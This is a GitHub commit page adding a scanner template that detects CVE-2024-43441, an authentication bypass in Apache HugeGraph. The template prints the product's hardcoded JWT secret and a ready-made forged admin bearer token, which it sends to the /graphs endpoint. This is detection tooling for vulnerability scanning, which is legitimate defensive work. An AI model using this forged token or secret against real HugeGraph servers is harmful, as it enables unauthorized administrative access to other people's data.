Skip to content

Commit 41fb459

Browse files
author
heonju
committed
feat(http/cves): add CVE-2024-43441 HugeGraph auth bypass
1 parent aaeb3ca commit 41fb459

File tree

1 file changed

+42
-0
lines changed

1 file changed

+42
-0
lines changed

http/cves/2024/CVE-2024-43441.yaml

Lines changed: 42 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,42 @@
1+
id: CVE-2024-43441
2+
3+
info:
4+
name: Apache HugeGraph - Authentication Bypass via Hardcoded JWT Secret
5+
author: wn147
6+
severity: critical
7+
description: |
8+
Apache HugeGraph uses a hardcoded JWT secret key ('FXQXbJtbCLxODc6tGci732pkH1cyf8Qg')
9+
when authentication is enabled but 'auth.token_secret' is not configured.
10+
An attacker can use this default key to generate valid JWT tokens and bypass authentication.
11+
reference:
12+
- https://github.com/advisories/GHSA-f697-gm3h-xrf9
13+
- https://github.com/apache/incubator-hugegraph/commit/03b40a52446218c83e98cb43020e0593a744a246
14+
classification:
15+
cve-id: CVE-2024-43441
16+
cwe-id: CWE-798
17+
tags: cve,cve2024,hugegraph,auth-bypass,jwt,hardcoded
18+
19+
http:
20+
- method: GET
21+
path:
22+
- "{{BaseURL}}/graphs"
23+
24+
headers:
25+
# Using a hardcoded token(long time)
26+
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX25hbWUiOiJhZG1pbiIsInVzZXJfaWQiOiItMzA6YWRtaW4iLCJleHAiOjIwNzE0NzY4MzB9.vb193qf4xpIPFcmCN8J0sRwqUaoS2RAUvFx9uLC-I7Q
27+
28+
matchers-condition: and
29+
matchers:
30+
- type: status
31+
status:
32+
- 200
33+
- type: word
34+
part: body
35+
words:
36+
- '"graphs":'
37+
- '"hugegraph"'
38+
condition: and
39+
- type: word
40+
part: header
41+
words:
42+
- "application/json"

0 commit comments

Comments
 (0)